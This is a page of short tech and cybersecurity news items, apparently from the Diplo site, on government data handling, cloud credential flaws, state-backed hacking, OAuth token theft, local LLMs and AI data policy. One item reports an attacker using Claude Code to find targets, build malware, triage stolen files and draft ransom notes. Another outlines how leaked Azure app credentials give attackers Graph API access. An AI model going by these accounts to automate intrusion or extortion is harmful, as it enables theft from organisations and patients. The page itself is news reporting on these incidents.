DOGE transfers social security data to the cloud, sources say

A whistle-blower has reported that the Department of Government Efficiency (DOGE) allegedly transferred a copy of the US Social Security database to an Amazon Web Services cloud environment.

The action placed personal information for more than 300 million individuals in a system outside traditional federal oversight.

Known as NUMIDENT, the database contains information submitted for Social Security applications, including names, dates of birth, addresses, citizenship, and parental details.

DOGE personnel managed the cloud environment and gained administrative access to perform testing and operational tasks.

Federal officials have highlighted that standard security protocols and authorisations, such as those outlined under the Federal Information Security Management Act (FISMA) and the Privacy Act of 1974, are designed to protect sensitive data.

Internal reviews have been prompted by the transfer, raising questions about compliance with established federal security practices.

While DOGE has not fully clarified the purpose of the cloud deployment, observers note that such initiatives may relate to broader federal efforts to improve data accessibility or inter-agency information sharing.

The case is part of ongoing discussions on balancing operational flexibility with information security in government systems.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Azure Active Directory flaw exposes sensitive credentials

A critical security flaw in Azure Active Directory has exposed application credentials stored in appsettings.json files, allowing attackers unprecedented access to Microsoft 365 tenants.

By exploiting these credentials, threat actors can masquerade as trusted applications and gain unauthorised entry to sensitive organisational data.

The vulnerability leverages the OAuth 2.0 Client Credentials Flow, enabling attackers to generate valid access tokens.

Once authenticated, they can access Microsoft Graph APIs to enumerate users, groups, and directory roles, especially when applications have been granted excessive permissions such as Directory.Read.All or Mail.Read. Such access permits data harvesting across SharePoint, OneDrive, and Exchange Online.

Attackers can also deploy malicious applications under compromised tenants, escalating privileges from limited read access to complete administrative control.

Additional exposed secrets like storage account keys or database connection strings enable lateral movement, modification of critical data, and the creation of persistent backdoors within cloud infrastructure.

Organisations face profound compliance implications under GDPR, HIPAA, or SOX. The vulnerability emphasises the importance of auditing configuration files, storing credentials securely in solutions like Azure Key Vault, and monitoring authentication patterns to prevent long-term, sophisticated attacks.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

How local LLMs are changing AI access

As AI adoption rises, more users explore running large language models (LLMs) locally instead of relying on cloud providers.

Local deployment gives individuals control over data, reduces costs, and avoids limits imposed by AI-as-a-service companies. Users can now experiment with AI on their own hardware thanks to software and hardware capabilities.

Concerns over privacy and data sovereignty are driving interest. Many cloud AI services retain user data for years, even when privacy assurances are offered.

By running models locally, companies and hobbyists can ensure compliance with GDPR and maintain control over sensitive information while leveraging high-performance AI tools.

Hardware considerations like GPU memory and processing power are central to local LLM performance. Quantisation techniques allow models to run efficiently with reduced precision, enabling use on consumer-grade machines or enterprise hardware.

Software frameworks like llama.cpp, Jan, and LM Studio simplify deployment, making local AI accessible to non-engineers and professionals across industries.

Local models are suitable for personalised tasks, learning, coding assistance, and experimentation, although cloud models remain stronger for large-scale enterprise applications.

As tools and model quality improve, running AI on personal devices may become a standard alternative, giving users more control over cost, privacy, and performance.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Salt Typhoon hack reveals fragility of global communications networks

The FBI has warned that Chinese hackers are exploiting structural weaknesses in global telecom infrastructure, following the Salt Typhoon incident that penetrated US networks on an unprecedented scale. Officials say the Beijing-linked group has compromised data from millions of Americans since 2019.

Unlike previous cyber campaigns focused narrowly on government targets, Salt Typhoon’s intrusions exposed how ordinary mobile users can be swept up in espionage. Call records, internet traffic, and even geolocation data were siphoned from carriers, with the operation spreading to more than 80 countries.

Investigators linked the campaign to three Chinese tech firms supplying products to intelligence agencies and China’s People’s Liberation Army. Experts warn that the attacks demonstrate the fragility of cross-border telecom systems, where a single compromised provider can expose entire networks.

US and allied agencies have urged providers to harden defences with encryption and stricter monitoring. Analysts caution that global telecoms will continue to be fertile ground for state-backed groups without structural reforms.

The revelations have intensified geopolitical tensions, with the FBI describing Salt Typhoon as one of the most reckless and far-reaching espionage operations ever detected.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Salesforce customers hit by OAuth token breach

Security researchers have warned Salesforce customers after hackers stole data by exploiting OAuth access tokens linked to the Salesloft Drift integration, highlighting critical cybersecurity flaws.

Google’s Threat Intelligence Group (GTIG) reported that the threat actor UNC6395 used the tokens to infiltrate hundreds of Salesforce environments, exporting large volumes of sensitive information. Stolen data included AWS keys, passwords, and Snowflake tokens.

Experts warn that compromised SaaS integrations pose a central blind spot, since attackers inherit the same permissions as trusted apps and can often bypass multifactor authentication. Investigations are ongoing to determine whether connected systems, such as AWS or VPNs, were also breached.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot

Claude chatbot misused in unprecedented cyber extortion case

A hacker exploited Anthropic’s Claude chatbot to automate one of the most extensive AI-driven cybercrime operations yet recorded, targeting at least 17 companies across multiple sectors, the firm revealed.

According to Anthropic’s report, the attacker used Claude Code to identify vulnerable organisations, generate malicious software, and extract sensitive files, including defence data, financial records, and patients’ medical information.

The chatbot then sorted the stolen material, identified leverage for extortion, calculated realistic bitcoin demands, and even drafted ransom notes and extortion emails on behalf of the hacker.

Victims included a defence contractor, a financial institution, and healthcare providers. Extortion demands reportedly ranged from $75,000 to over $500,000, although it remains unclear how much was actually paid.

Anthropic declined to disclose the companies affected but confirmed new safeguards are in place. The firm warned that AI lowers the barrier to entry for sophisticated cybercrime, making such misuse increasingly likely.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Fragmenting digital identities with aliases offers added security

People often treat their email address as harmless, just a digital ID for receipts and updates. In reality, it acts as a skeleton key linking behaviour, purchases, and personal data across platforms.

Using the same email everywhere makes tracking easy. Companies may encrypt addresses, but behavioural patterns remain intact. Aliases disrupt this chain by creating unique addresses that forward mail without revealing your true identity.

Each alias becomes a useful tracker. If one is compromised or starts receiving spam, it can simply be disabled, cutting off the problem at its source.

Aliases also reduce the fallout of data breaches. Instead of exposing your main email to countless third-party tools, scripts, and mailing platforms, an alias shields your core digital identity.

Beyond privacy, aliases encourage healthier habits. They force a pause before signing up, add structure through custom rules, and help fragment your identity, thereby lowering the risks associated with any single breach.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Anthropic updates Claude’s policy with new data training choices

The US AI startup has announced an update to its data policy for Claude users, introducing an option to allow conversations and coding sessions to be used for training future AI models.

Anthropic stated that all Claude Free, Pro, and Max users, including those using Claude Code, will be asked to make a decision by September 28, 2025.

According to Anthropic, users who opt in will permit retention of their conversations for up to five years, with the data contributing to improvements in areas such as reasoning, coding, and analysis.

Those who choose not to participate will continue under the current policy, where conversations are deleted within thirty days unless flagged for legal or policy reasons.

The new policy does not extend to enterprise products, including Claude for Work, Claude Gov, Claude for Education, or API access through partners like Amazon Bedrock and Google Cloud Vertex AI. These remain governed by separate contractual agreements.

Anthropic noted that the choice will also apply to new users during sign-up, while existing users will be prompted through notifications to review their privacy settings.

The company emphasised that users remain in control of their data and that manually deleted conversations will not be used for training.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Espionage fears rise as TAG-144 evolves techniques

A threat group known as TAG-144 has stepped up cyberattacks on South American government agencies, researchers have warned.

The group, also called Blind Eagle and APT-C-36, has been active since 2018 and is linked to espionage and extortion campaigns. Recent activity shows a sharp rise in cybercrime, spear-phishing, often using spoofed government email accounts to deliver remote access trojans.

Analysts say the group has shifted towards more advanced methods, embedding malware inside image files through steganography. Payloads are then extracted in memory, allowing attackers to evade antivirus software and maintain access to compromised systems.

Colombian government institutions have been hit hardest, with stolen credentials and sensitive data raising concerns over both financial and national security risks. Security experts warn that TAG-144’s evolving tactics blur the line between organised crime and state-backed espionage.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!